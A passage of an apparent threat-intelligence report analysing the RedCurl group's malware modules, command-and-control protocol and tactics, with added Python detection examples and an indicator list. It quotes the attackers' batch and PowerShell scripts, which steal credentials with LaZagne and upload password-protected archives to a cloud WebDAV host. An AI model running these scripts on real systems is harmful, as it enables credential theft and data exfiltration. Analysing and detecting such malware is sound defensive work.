It is possible that they were unable to implement the functionality due to a tight deadline and that it will appear in the group’s future attacks.\r\n\r\nRedCurl.Downloader contains two C2 addresses: a main one and a backup one. The latter was used only when the former failed to respond. The next stage, RedCurl.Extractor, was downloaded from the same C2 server to which information about the infected system was sent. The application saved the obtained file under a name matching the template %APPDATA%\\[a-z]{10}.[a-z]{3}, loaded it into its own process (Extractor is a DLL file), and called the MainDll function. After Extractor had been executed, it was deleted from the infected system.\r\nRedCurl.Extractor\r\nRedCurl.Extractor is a DLL file equivalent to RedCurl.Dropper, which extracted the file of the legitimate 7z utility and another of the group’s new tools: RedCurl.FSABIN. The dropper itself did not perform any network communications. Both files as well as the data decryption key were contained in the body of RedCurl.Extractor in encrypted form.\r\nBefore extracting the payload, Extractor created a directory in %LOCALAPPDATA%. It is noteworthy that the name of the created directory mimicked the name of a system folder. For example:\r\n• MemoryDiagnosticServices\r\n• AppIDStorage\r\n• Provision\r\nThereafter, both files were saved in the new directory under the following names:\r\n• For the 7z utility: %[a-z]{2,3}%%MD5(%USERNAME%)[16:]%.exe\r\n• For the RedCurl.FSABIN module: %[a-z]{2,3}%%MD5(%COMPUTERNAME%)[16:]%.dll\r\nRedCurl.FSABIN was launched through a task that repeated once an hour. The part of the password used for decrypting the data inside the module was passed as the launch argument.\r\nFig. 10. 
Example of information about the infected device sent by RedCurl.Downloader\r\n\r\nRedCurl.FSABIN\r\nBefore describing the tool, we will present the overall pattern for receiving and executing a command:\r\nFig. 11. Diagram of RedCurl.FSABIN command execution [diagram labels: commands delivered over HTTP to FSABIN / CHABIN1 / CHABIN2; downloads, decrypts and executes commands; collects information and creates an archive on a cloud disk; mounts the cloud disk; documents, credentials and system information are collected into a password-protected 7z archive and sent over WebDAV]\r\nThe module is a binary equivalent of RedCurl.FirstStageAgent, but with two main differences:\r\n1. The new tool cannot launch RedCurl.Channel1 or RedCurl.Channel2.\r\n2. RedCurl.FSABIN receives commands not from public storage drives but from HTTP servers controlled by the hackers.\r\nThe tool is launched using repeated tasks. Below is an example of a task name:\r\nMUI\\LPRemove_%PIECE_OF_HASH%, where %PIECE_OF_HASH% is MD5(%USERNAME%)[16:]\r\nBelow is an example of a created task:\r\nFig. 12. Example of a task used to launch RedCurl.FSABIN\r\n\r\nThe network part of the tool has a lot in common with RedCurl.Downloader: both modules contain two C2 addresses in encrypted form. The password for decrypting this type of data is concatenated from two strings: a part built into the module and the application’s launch argument. The module itself is responsible solely for downloading and executing commands, but even this single functionality makes it a flexible and dangerous tool in a hacker’s arsenal. Another similarity with RedCurl.Downloader is the mechanism for checking for an Internet connection.\r\nAfter checking for an Internet connection, the application checked the name of the process in whose context it was launched. If the name was not svchost.exe or services.exe, RedCurl.FSABIN stopped working. 
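As an added defender-side example (not Group-IB code), the following Python helper checks exported scheduled-task names and actions against the task-name templates and the rundll32 launch form described above for RedCurl.Downloader and RedCurl.FSABIN; the task list, computer name and user name are constructed, and the UTF-8 encoding of the user name for the MD5 suffix is an assumption.

```python
import hashlib
import re

# rundll32.exe shell32.dll,Control_RunDLL <DLL path> <decryption-key fragment>
# is the launch form the report gives for RedCurl.Downloader (and the FSABIN/CHABIN tasks).
RUNDLL_CONTROL = re.compile(
    r"rundll32(?:\.exe)?\s+shell32\.dll,Control_RunDLL\s+\S+\.dll\s+\S+", re.IGNORECASE
)


def expected_fsabin_suffix(username: str) -> str:
    """%PIECE_OF_HASH% = MD5(%USERNAME%)[16:] per the report; UTF-8 encoding is an assumption."""
    return hashlib.md5(username.encode("utf-8")).hexdigest()[16:]


def redcurl_task_patterns(computername: str, username: str) -> dict:
    """Compiled regexes for the task-name templates attributed to RedCurl, for one host/user."""
    c, u = re.escape(computername), re.escape(username)
    return {
        # RedCurl.Downloader persistence: \Temp\[A-Z]{4}%COMPUTERNAME%\[a-z]{4,5}%USERNAME%
        "RedCurl.Downloader": re.compile(rf"^\\?Temp\\[A-Z]{{4}}{c}\\[a-z]{{4,5}}{u}$"),
        # RedCurl.FSABIN: MUI\LPRemove_<MD5(%USERNAME%)[16:]> ([a-f0-9]+ in the IoC list)
        "RedCurl.FSABIN": re.compile(r"^\\?MUI\\LPRemove_[a-f0-9]+$"),
        # Further task name from the IoC list: FileHistory\FileHistory_[a-f0-9]+
        "RedCurl (FileHistory task)": re.compile(r"^\\?FileHistory\\FileHistory_[a-f0-9]+$"),
    }


def classify_task(name: str, action: str, computername: str, username: str):
    """Return (label, confidence) for a suspicious task, or None."""
    launches_dll = bool(RUNDLL_CONTROL.search(action or ""))
    for label, pattern in redcurl_task_patterns(computername, username).items():
        if pattern.match(name):
            # The name template alone is "medium"; a matching rundll32 action, or an LPRemove
            # suffix equal to the MD5 slice of the logged-on user, raises it to "high".
            strong = launches_dll
            if label == "RedCurl.FSABIN" and name.lower().endswith(expected_fsabin_suffix(username)):
                strong = True
            return label, "high" if strong else "medium"
    if launches_dll:
        # Control_RunDLL used to run an arbitrary DLL with an argument is worth a look on its own.
        return "rundll32 Control_RunDLL launch of a DLL with an argument", "low"
    return None


def hunt(tasks, computername: str, username: str) -> list:
    """tasks: iterable of (task name, action) pairs, e.g. parsed from 'schtasks /query /v /fo csv'."""
    flagged = []
    for name, action in tasks:
        verdict = classify_task(name, action, computername, username)
        if verdict is not None:
            flagged.append((name, verdict[0], verdict[1]))
    return flagged


# Constructed sample export (not from the report's telemetry); KEYFRAG is a placeholder argument.
SAMPLE_TASKS = [
    (r"\Temp\UGTEWS-01\apraivanov",
     r"rundll32.exe shell32.dll,Control_RunDLL C:\Users\ivanov\AppData\Roaming\MTLKWS-01\paranivanov.dll KEYFRAG"),
    (r"\MUI\LPRemove_" + expected_fsabin_suffix("ivanov"),
     r"rundll32.exe shell32.dll,Control_RunDLL C:\Users\ivanov\AppData\Local\MemoryDiagnosticServices\abc123.dll KEYFRAG"),
    (r"\Microsoft\Windows\Defrag\ScheduledDefrag", r"%windir%\system32\defrag.exe -c -h -o -$"),
]

if __name__ == "__main__":
    for task_name, label, confidence in hunt(SAMPLE_TASKS, "WS-01", "ivanov"):
        print(f"{confidence:6} {label}: {task_name}")
```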
The module received the command by sending a POST request. The request body contained the names of the user and computer on which the malicious file was launched. At this point, we once again come across a feature similar to RedCurl.Downloader: the message was formed according to a similar pattern.\r\nThe process of receiving the command from the server can be divided into two stages:\r\n1. Information about the infected device was sent and the encrypted command was received.\r\n2. Random data was sent to the server and the decryption key was received.\r\nThe pattern for receiving the command is as follows:\r\n[a-zA-Z0-9]{5,14}=BASE64(%COMPUTERNAME%)\u0026[a-zA-Z0-9]{5,14}=BASE64(%USERNAME%)\r\nFig. 13. Diagram of RedCurl.FSABIN receiving commands from the server\r\nWhen making both requests (for the command and for the password), the application used one and the same User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246001. In the first message, the application sent information about the infected device to the server and received the encrypted command in response. If the command was received successfully, a POST request was made with a parameter generated according to the following pattern: [a-zA-Z0-9]{5,14}=[a-zA-Z0-9]{5,14} (although we currently do not know how the hackers used the data sent). In response to this request, the server sent a password. Based on this password, a decryption key was generated for the command. This is where we encountered another anti-debugging method: before the command was decrypted and launched, the IsDebuggerPresent function was called. As the name suggests, the function determines whether the application is being debugged. If the result was true, the module terminated itself. 
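The check-in formats described above for RedCurl.Downloader (five fields) and RedCurl.FSABIN (two fields), as an added detection example that is not part of the original report: the Python parser below runs over constructed proxy-log records (User-Agent plus POST body) and decodes the host and user names; the sample field names, the assumption that the body is captured unencoded, and the cp866 fallback are mine.

```python
import base64
import re
from typing import Optional

# User-Agent the report quotes for the RedCurl.Downloader and RedCurl.FSABIN POST requests
# ("...Edge/12.246001"); the Downloader connectivity check used the same string ending in "Edge/12".
REDCURL_UA_PREFIX = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                     "(KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12")

# Parameter-name templates from the report: Downloader [a-z]{5,19}, FSABIN [a-zA-Z0-9]{5,14}.
DOWNLOADER_KEY = re.compile(r"^[a-z]{5,19}$")
FSABIN_KEY = re.compile(r"^[a-zA-Z0-9]{5,14}$")
# Standard base64 alphabet with optional padding; assumes the body is captured unencoded.
B64_VALUE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _decode_name(value: str) -> str:
    """Base64 field to text. UTF-8 first; the cp866 fallback is an assumption based on the
    report's note that the backend needed that code page to display Cyrillic names."""
    raw = base64.b64decode(value, validate=True)
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw.decode("cp866", "replace")


def parse_checkin(body: str) -> Optional[dict]:
    """Classify a POST body as a Downloader or FSABIN check-in and decode it, else None."""
    pairs = [p.split("=", 1) for p in body.split("&")]
    if any(len(p) != 2 for p in pairs):
        return None
    keys = [k for k, _ in pairs]
    vals = [v for _, v in pairs]
    try:
        # Downloader: computer, domain, user (base64), the [0, 23] "time zone" integer, file listing.
        if len(pairs) == 5 and all(DOWNLOADER_KEY.match(k) for k in keys):
            if not (all(B64_VALUE.match(vals[i]) for i in (0, 1, 2, 4)) and vals[3].isdigit()):
                return None
            return {
                "module": "RedCurl.Downloader",
                "computer": _decode_name(vals[0]),
                "domain": _decode_name(vals[1]),
                "user": _decode_name(vals[2]),
                "tz_field": int(vals[3]),
                "listing_bytes": len(base64.b64decode(vals[4], validate=True)),
            }
        # FSABIN first request: computer and user, both base64.
        if (len(pairs) == 2 and all(FSABIN_KEY.match(k) for k in keys)
                and all(B64_VALUE.match(v) for v in vals)):
            return {"module": "RedCurl.FSABIN", "computer": _decode_name(vals[0]),
                    "user": _decode_name(vals[1])}
    except ValueError:  # binascii.Error (malformed base64) is a ValueError
        return None
    return None


def scan_records(records) -> list:
    """records: dicts with 'ua' and 'body' (for example from a decrypting proxy). Returns
    (index, parsed) for requests whose User-Agent matches the report's string and whose
    body parses as a check-in."""
    hits = []
    for i, rec in enumerate(records):
        if not rec.get("ua", "").startswith(REDCURL_UA_PREFIX):
            continue  # the UA gate keeps the loose two-field FSABIN shape from matching ordinary forms
        parsed = parse_checkin(rec.get("body", ""))
        if parsed is not None:
            hits.append((i, parsed))
    return hits


def _b64(text: str) -> str:
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


# Constructed sample records for this example, not captured traffic.
SAMPLE_RECORDS = [
    {"ua": REDCURL_UA_PREFIX + ".246001",
     "body": "&".join([
         "qwertyuio=" + _b64("WS-01"), "asdfgh=" + _b64("CORP"), "zxcvbnmlk=" + _b64("ivanov"),
         "poiuy=17", "lkjhgfd=" + _b64("C:\\Users\\ivanov\\Desktop\\plan.xlsx\r\n")])},
    {"ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/92.0", "body": "q=1&lang=en"},
    {"ua": REDCURL_UA_PREFIX + ".246001",
     "body": "Ab12cdE=" + _b64("WS-01") + "&x9Y8z7Wv=" + _b64("ivanov")},
]

if __name__ == "__main__":
    for index, hit in scan_records(SAMPLE_RECORDS):
        print(index, hit)
```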
Overall, decrypting and executing the command occurred as follows:\r\n1. From the second response string (the password), RedCurl.FSABIN calculated the SHA256 value, with the first 16 bytes of the hash used as the key.\r\n2. RedCurl.FSABIN decrypted the received command (the first response from the server) using the key from the previous step. AES-128 CBC was used as the decryption algorithm.\r\n3. RedCurl.FSABIN saved the decrypted command to the path %LOCALAPPDATA%\\%FSA_FOLDER%\\[a-zA-Z0-9]{5,14}.bat.\r\n4. RedCurl.FSABIN searched for the 7z utility in the directory containing the module. If the utility was found, the application set the environment variable syspack. The executable file of the 7z utility was renamed every time RedCurl.FSABIN was launched; the names were generated according to the template [a-z]{8,15}.\r\n5. RedCurl.FSABIN launched the command by calling the ShellExecute() function.\r\n6. The command sent the information (collected while executing the command) to a cloud drive via the WebDAV protocol.\r\n\r\nIn addition to executing commands, the old PowerShell version of RedCurl.FirstStageAgent was responsible for launching the RedCurl.Channel1 and RedCurl.Channel2 modules. The new (binary) version does not have this functionality. However, during incident response activities, we discovered updated versions of Channel1 and Channel2 on the infected devices. In terms of functionality, RedCurl.CHABIN1 is no different from RedCurl.FSABIN, while RedCurl.CHABIN2 differs only in that it determines the proxy server settings in the system and uses them to connect to the servers used by the hackers. 
RedCurl.CHABIN1 and RedCurl.CHABIN2\r\nCommunicating with the server involves using libcurl library functions as opposed to Windows API functions.\r\nIt should be noted that initially the FirstStageAgent and Channel1 modules did not differ from each other in how they communicated with the hackers: communication took place through the curl utility. The Channel2 module received the command by mounting a network drive in the system. Before the major update that we are examining as part of this investigation, the way the Channel1 module received the command had been changed: the module made the request by creating a COM object, MSXML2.XMLHTTP. This meant that each module was implemented differently, which ensured a high level of independence between them. As far as we can tell at the moment, the CHABIN1 module we discovered seems to simply be a fork of the FSABIN module. In the future, CHABIN1 could be updated like its predecessor, but currently the module makes it possible to “parallelize” the way that commands are processed on infected devices.\r\nThe modules in question are used exclusively as an alternative channel for controlling the device and are needed if for any reason FSABIN cannot perform its functions. In such cases, the hackers continue to manage the device using Channel1 and/or Channel2. Unfortunately, at the time of writing this report, the log data that could have helped us determine exactly how these modules were delivered to the infected device had not been preserved. We assume that the modules were delivered through a command to devices that were critical for the attackers.\r\n\r\nAs indicated above, lateral movement within an organization’s infrastructure involves creating LNK files disguised as internal documents on shared network drives. 
This tool was used in the group’s previous attacks, but it underwent significant changes. Unfortunately, our investigation did not reveal which exact tool in RedCurl’s arsenal was used to infect network drives. Based on our experience in monitoring the group’s activities, however, we can assume with a high level of confidence that the drives were infected through a command.\r\nFirst, a zero-size file named %GUID_PATTERN%.git was delivered to the infected network drive (we discovered the file in the form of a WIM image). The file contained five alternate data streams: four images (for files with the extensions doc, jpg, pdf and xls) and one stream made up of the modified RedCurl.Extractor module. The images were used as icons for the created LNK files.\r\nAfter discovering a potentially interesting document, the script responsible for infecting the network drive hid that document from the user and created an LNK file with the same name. When the user opened the malicious LNK file, it launched RedCurl.Extractor with the argument -file followed by the path to the original document, which RedCurl.Extractor then opened:\r\nshell32.dll,Control_RunDLL \"\\%SHARES%\\%DIR%\\%GUID%.git:%RC_DROPPER_NAME%.dll\" -file=%ORIG_DOC_NAME%\r\nThis means that when a user opened the LNK file from the network drive, RedCurl.Extractor was launched on the device, and RedCurl.Extractor in turn launched the original document. Below is the output of the stream utility for the .git file:\r\nLNK file infector\r\nFig. 14. Contents of the .git file\r\n\r\nCommands\r\nAs in past attacks, RedCurl.Commands modules are batch scripts that extended functionality and allowed any actions to be taken on infected devices. 
Their capabilities were limited only by those of the Windows command interpreter, which in practice gave the attackers unlimited control over the infected device.\r\nAs with past versions, commands still saved the results of their work on legitimate cloud drives in password-protected archives; these are the only tools in RedCurl’s arsenal not to have been moved to free web hosting services. To create the archives, the hackers used the 7z utility, which they delivered to the infected system using the RedCurl.Extractor module, while the password for the archive was stored in the command body. The hackers also continued to use the tools LaZagne (https://github.com/AlessandroZ/LaZagne) and ADExplorer (https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer). Files were uploaded to a cloud drive using PowerShell commands, which were duplicated several times in one module.\r\ngci $env:appdata -recurse -force | Out-File .\\%tdircurl%\\!!_$env:computername.tmp;\r\n$IsProxy = $True;\r\n$var_paramproxy_01=(new-object System.Net.WebClient).Proxy.GetProxy('http://www.msn.com').OriginalString;\r\nif ($var_paramproxy_01 -eq 'http://www.msn.com') {$IsProxy = $False};\r\n$PS_WEBCLIENT_01 = New-Object -ComObject MSXML2.XMLHTTP;\r\nif ($IsProxy -eq $True){\r\n$PS_WEBCLIENT_01.setProxy(2, $var_paramproxy_01,'');\r\n};\r\n$ADO_FILE_STREAM = New-Object -ComObject ADODB.Stream;\r\n$ADO_FILE_STREAM.Open();\r\n$ADO_FILE_STREAM.Type = 1;\r\nGet-ChildItem \".\\%tdircurl%\" | Where-Object {\r\n $_.PSIsContainer -eq $false;\r\n} | foreach {\r\n$ADO_FILE_STREAM.LoadFromFile($_.FullName);\r\n$ADO_FILE_BUFFER = $ADO_FILE_STREAM.Read();\r\n$PS_WEBCLIENT_01.Open('PUT', '%davstr%/%davfld%/'+$_.Name, $False, '%slog%', '%spass%');\r\n$PS_WEBCLIENT_01.Send($ADO_FILE_BUFFER);\r\n};\r\n$PS_WEBCLIENT_01.Close;\r\nri .\\%tdircurl% -recurse -force;\r\n\r\nAs in past versions, 
some commands contained a stop list of devices that the hackers were not interested in (it contained computer names). In the past, the check was carried out on the client side because commands were placed on public cloud drives, so it was impossible to check on which exact device the command would be executed. In recent attacks, the check could have been performed on the server side, as the commands were received from controlled web hosting services. RedCurl ignored this option, however, once again most likely due to the tight deadline for developing the tools. If the computer name was on the stop list, the module with the command terminated itself. All necessary information, such as archive passwords, login details including the password, and the address of the cloud service, could be found at the start of the file in non-encrypted form.\r\nif %pc%==%computername% goto start\r\nset pc=SOME_COMPUTERNAME\r\nif %pc%==%computername% goto start\r\ngoto stop\r\n:start\r\nif not defined syspack set syspack=syspack.exe\r\nset mlog=\"login\"\r\nset mpass=\"pass\"\r\nset packpass=\"packpass\"\r\nset packpass2=\"packpass2\"\r\nset davfld=PBX\r\nset davstr=hXXps://dav.box[.]com/dav\r\nset dnfile=lz243p.tmp\r\nWhen they were launched, commands created temporary directories to save the results of their work. The folder containing the RedCurl.FSABIN module acted as the working directory. Directory names were generated according to the template temp[0-9]{2,4}. Information about the infected device was collected using standard utilities, and the output was written to files in the temporary directory where the module was located.\r\nmkdir temp051\r\nsysteminfo\u003e\u003etemp051\\sys.txt\r\nwhoami /ALL\u003e\u003etemp051\\whoami.txt\r\nnet use\u003e\u003etemp051\\net.txt\r\nwmic logicaldisk get description,name,Size\u003e\u003etemp051\\disks.txt\r\nThe command was a batch script, but it could have a PowerShell script embedded in it. 
For example, the list of files and folders could be collected using the following commands:\r\nGet-ChildItem \"C:\\\" -Recurse -Force | Out-File -FilePath \".\\temp051\\C.tmp\";\r\nGet-ChildItem \"D:\\\" -Recurse -Force | Out-File -FilePath \".\\temp051\\D.tmp\";\r\n\r\nThe information collected was added to the password-protected archive and sent to the server using the script shown above.\r\nset tdircurl=temp%random%\r\nmkdir %tdircurl%\r\n%syspack% a -p%ppass% -mhe=on -sdel -y %tdircurl%\\%computername%_inf_%random%.tmp temp051\r\nTake note of the ppass variable; we will come back to it. After collecting basic information about the system, the command downloaded the archive with the necessary utilities from the same network drive.\r\n$IsProxy = $True;\r\n$var_paramproxy_01=(new-object System.Net.WebClient).Proxy.GetProxy('http://www.msn.com').OriginalString;\r\nif ($var_paramproxy_01 -eq 'http://www.msn.com') {$IsProxy = $False};\r\n$PS_WEBCLIENT_01 = New-Object -ComObject MSXML2.XMLHTTP;\r\nif ($IsProxy -eq $True) {\r\n$PS_WEBCLIENT_01.setProxy(2, $var_paramproxy_01,'');\r\n};\r\n$PS_WEBCLIENT_01.Open('GET', '%davstr%/%davfld%/%dnfile%', $False, '%mlog%', '%mpass%');\r\n$PS_WEBCLIENT_01.Send();\r\nif($PS_WEBCLIENT_01.status -ne \"404\") {\r\n$PS_WEBCLIENT_01.responseBody | Set-Content '.\\%dnfile%' -Encoding Byte;\r\n};\r\nIf the download was successful, the command continued its execution. Files were extracted from the archive and LaZagne was launched using the Python interpreter. 
Data extracted using the utility was added to the password-protected archive and sent to a cloud drive.\r\nif not exist %dnfile% goto end2\r\n%syspack% x -aoa -p%packpass2% %dnfile% -opython2\r\ndir python2\u003e\u003etemp028\\log.txt\r\ndir python2\\lz\u003e\u003etemp028\\log1.txt\r\ncd python2\r\npython.exe lz\\lz.py all\u003e\u003e..\\temp028\\pw.txt 2\u003e\u00261\r\ntimeout /T 10\r\npython.exe lz\\lz.py all\u003e\u003e..\\temp028\\pw1.txt\r\ntimeout /T 10\r\ncd ..\\\r\nset tdircurl=temp%random%c\r\nmkdir %tdircurl%\r\n%syspack% a -p%ppass% -mhe=on -sdel -y %tdircurl%\\%computername%_ps_%random%.tmp temp028\r\n\r\nAfter the work was completed, all the created directories and modules were deleted.\r\nrd /S /Q %tdircurl%\r\ndel /F /Q ade.tmp\r\nrd /S /Q temp011\r\ndel /F /Q lz243p.tmp\r\nrd /S /Q temp028\r\nrd /S /Q python2\r\n:stop\r\ndel %0\r\n:end2\r\ndel %0\r\nNow comes a particularly interesting part. Earlier we asked you to take note of the ppass variable. The fact is that the script shown above does not set this variable, and the variable does not exist in the system by default. Once again we assume that the attackers were rushed when creating the modules and made a logic error: the variable packpass should have been used instead of ppass:\r\n...\r\nset packpass=TiIualLARZAX30nfY1hstcLo2sS5PmWKLPy6ZOzuS2\r\n...\r\n%syspack% a -p%ppass% -mhe=on -sdel -y %tdircurl%\\%computername%_inf_%random%.tmp temp051\r\n...\r\n%syspack% a -p%ppass% -mhe=on -sdel -y %tdircurl%\\%computername%_ps_%random%.tmp temp028\r\n...\r\nBecause the environment variable was not set, the string %ppass% was used as the password instead of the string TiIualLARZAX30nfY1hstcLo2sS5PmWKLPy6ZOzuS2.\r\nAs indicated above, the victim organization noticed that malicious LNK files had been created on network drives. 
This means that at least one more updated command was involved in the attack: ins/inst. Unfortunately, it was impossible to retrieve all the commands used as part of the two attacks.\r\n\r\nConclusion\r\nLast year, Group-IB specialists announced for the first time that they had discovered a new Russian-speaking hacker group, which they named RedCurl. Between 2018 and 2020, we identified 26 attacks carried out by the group and 14 victim organizations in various industries. Seven months later, in 2021, the attacks resumed. This time we uncovered four attacks. In two of them, the identified victim was attacked twice. After a long break, the group returned to the cyber espionage scene. Our Threat Intelligence \u0026 Attribution system has detected the group’s updated tools being used in the wild with increased frequency. This means that more and more companies could fall victim to the group, which conducts thoroughly planned, targeted attacks on companies in order to steal confidential documents. The Group-IB Threat Intelligence team continues to monitor RedCurl’s activity. Because the group has resumed its attacks, we have shared a list of basic recommendations that IT and security teams should follow, regardless of a company’s size and field of activity. Our goal is to help companies minimize the likelihood of becoming a victim and make sure that their assets are protected against RedCurl.\r\nTo better understand the techniques, tactics, and procedures used by RedCurl in its attacks, as usual we have published the MITRE ATT\u0026CK (Adversarial Tactics, Techniques \u0026 Common Knowledge) matrix. 
The data it contains is based on our own experience in responding to and analyzing the group’s attacks.\r\n\r\nMITRE ATT\u0026CK® (RedCurl)\r\nTactic | Technique | Procedure\r\nTA0001: Initial Access | T1566.002: Spearphishing Link | The attackers used phishing emails with links to SFX archives containing malicious LNK files in order to gain initial access to the target host.\r\nTA0002: Execution | T1204.002: Malicious File | Victims must open the malicious LNK, XLAM, MHT or JS file to begin the compromise process.\r\nTA0002: Execution | T1059.003: Windows Command Shell | The attackers used cmd.exe to execute batch scripts.\r\nTA0002: Execution | T1059.001: PowerShell | The attackers used PowerShell scripts while performing post-exploitation tasks.\r\nTA0003: Persistence | T1053.005: Scheduled Task | The attackers created tasks in the Scheduler to ensure persistence on compromised systems.\r\nTA0003: Persistence | T1547.001: Registry Run Keys / Startup Folder | The attackers created entries in the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key to ensure persistence on compromised systems.\r\nTA0005: Defense Evasion | T1027: Obfuscated Files or Information | The attackers used encryption and Base64-encoded PowerShell commands.\r\nTA0005: Defense Evasion | T1036.005: Match Legitimate Name or Location | The attackers disguised the scripts and the tasks in the Scheduler using names similar to legitimate ones.\r\nTA0005: Defense Evasion | T1070.004: File Deletion | The attackers deleted batch scripts immediately after they were executed.\r\nTA0005: Defense Evasion | T1564.001: Hidden Files and Directories | The attackers added the \"hidden\" attribute to malicious libraries and to the files that the malicious LNK files pointed to.\r\nTA0005: Defense Evasion | T1218.011: Rundll32 | The attackers used rundll32.exe to launch RedCurl.Downloader, RedCurl.FSABIN, RedCurl.CHABIN1 and RedCurl.CHABIN2.\r\nTA0006: Credential Access | T1003.001: LSASS Memory | The attackers used LaZagne to extract passwords 
from volatile memory.\r\nTA0006: Credential Access | T1555.003: Credentials from Web Browsers | The attackers used LaZagne to extract passwords saved by web browsers.\r\nTA0006: Credential Access | T1552.001: Credentials in Files | The attackers used LaZagne to extract passwords saved in files.\r\nTA0006: Credential Access | T1552.002: Credentials in Registry | The attackers used LaZagne to extract passwords saved in the registry.\r\nTA0006: Credential Access | T1056.002: GUI Input Capture | The attackers used a phishing pop-up window made to look like Microsoft Outlook to obtain authentication details.\r\nTA0007: Discovery | T1082: System Information Discovery | The attackers regularly collected information about the compromised systems.\r\nTA0007: Discovery | T1035: Network Share Discovery | The attackers collected information about network drives available to compromised hosts.\r\nTA0007: Discovery | T1083: File and Directory Discovery | The attackers collected information about files on local and network drives.\r\nTA0007: Discovery | T1087.001: Local Account | The attackers collected information about local accounts.\r\nTA0007: Discovery | T1087.002: Domain Account | The attackers collected information about domain accounts.\r\nTA0007: Discovery | T1087.003: Email Account | The attackers collected information about email accounts.\r\nTA0008: Lateral Movement | T1080: Taint Shared Content | The attackers placed modified LNK files on network drives, which made it possible for them to move laterally across the network.\r\nTA0009: Collection | T1119: Automated Collection | The attackers used batch scripts to collect data.\r\nTA0009: Collection | T1005: Data from Local System | The attackers collected data from local drives on the compromised systems.\r\nTA0009: Collection | T1039: Data from Network Shared Drive | The attackers collected data from network drives.\r\nTA0009: Collection | T1114.001: Local Email Collection | The attackers collected email correspondence.\r\nTA0011: Command and 
Control | T1102: Web Service | The attackers used legitimate web services to download malicious batch scripts.\r\nTA0011: Command and Control | T1071.001: Web Protocols | The attackers used the HTTP, HTTPS and WebDAV protocols to make network connections.\r\nTA0011: Command and Control | T1573.001: Symmetric Cryptography | The attackers used AES-128 CBC to encrypt commands sent by the server.\r\nTA0010: Exfiltration | T1020: Automated Exfiltration | The attackers used batch scripts to exfiltrate data.\r\nTA0010: Exfiltration | T1537: Transfer Data to Cloud Account | The attackers used cloud storage systems to copy data.\r\n\r\nIndicators of compromise\r\n
AWAKENING\r\nFilename: %LOCALAPPDATA%\\SubFileHistory\\[a-z0-9]+.dll\r\nMD5: d6f318f77d3399e12e3e17abcd45d1c5\r\nSHA1: 373d0a0896a64fe61c7e13664e8f5f322d639e2f\r\nSHA256: c0f04cefd10f1e65f342d9456a3cab4b2b1aab6523a4789147e6ef556a7e8585\r\nPE Timestamp: Tuesday, 25.05.2021 11:50:24 UTC\r\nSize: 130560 bytes\r\nFilename: %APPDATA%\\MUIControl\\[a-z0-9]+.dll\r\nMD5: b74963e673087369da5fbe113b131254\r\nSHA1: 26c5925ab6d08a62e05922a04500b648bc0453c5\r\nSHA256: 12ae4ed672f495619fa480477d4b83d058ad3764ecaf86cd490cd3ea689158bc\r\nPE Timestamp: Monday, 19.04.2021 13:51:57 UTC\r\nSize: 130560 bytes\r\nFilename: %LOCALAPPDATA%\\MemoryDiagnosticServices\\[a-z0-9]+.dll\r\nMD5: 2ba63190a59228000e4616c3bd716b49\r\nSHA1: 839504fe83ae756fd67a8a52a9a9c345b4fbb531\r\nSHA256: 2cbdda564a8e2cbcffdbab89b978cba561d42da1889de7c817d8e0cd663c3322\r\nPE Timestamp: Wednesday, 28.04.2021 11:12:59 UTC\r\nSize: 130560 bytes\r\nMD5: 44341aedca34426e87da9dad3f547c11\r\nSHA1: 38f90080c6a431eaf6ba947c6e85c3ce19380797\r\nSHA256: cceef032c86d7ebac083c6506506fee8dd83475a10853e11bb133d2ec70115fe\r\nPE Timestamp: Tuesday, 11.05.2021 09:44:12 UTC\r\nSize: 130560 bytes\r\nFilename: %APPDATA%\\AppIDStorage\\convpolchk_b816871.dll\r\nMD5: df8030fa5a34d22cb08a7814b63e282f\r\nSHA1: 01a9a93954a6ae1c66fe82388c862b192e61270f\r\nSHA256: 00d10d276f3684787302a826c44718af77ff41020e2fbaed24fbec893e1f2004\r\nPE Timestamp: Wednesday, 28.04.2021 10:29:31 UTC\r\nSize: 213504 bytes\r\nFilename: mouseinpsync_98ab1ee.dll\r\nMD5: 2d65238c24657d395309e5cd01d9a8b7\r\nSHA1: 2dfce2fbdd44468aca08bf912b2ac33081015366\r\nSHA256: d6b6211bf7725ebd9a221ba182320f2cf91a9a0a1b70f685e207be40278e8f80\r\nPE Timestamp: Thursday, 15.04.2021 11:55:38 UTC\r\nSize: 213504 bytes\r\nFilename: oobedscvr_cf25318.dll\r\nMD5: 58c3d684fecd62e3fd23f1d8a9fb0efb\r\nSHA1: e125d5585b30805860919930a7fb896b84a8c8b4\r\nSHA256: 2310a5e1710b34c140d5a8a29c182efdeae224262498f9c51b9eb1e2b1c9aa8a\r\nPE Timestamp: Tuesday, 11.05.2021 10:28:07 UTC\r\nSize: 213504 
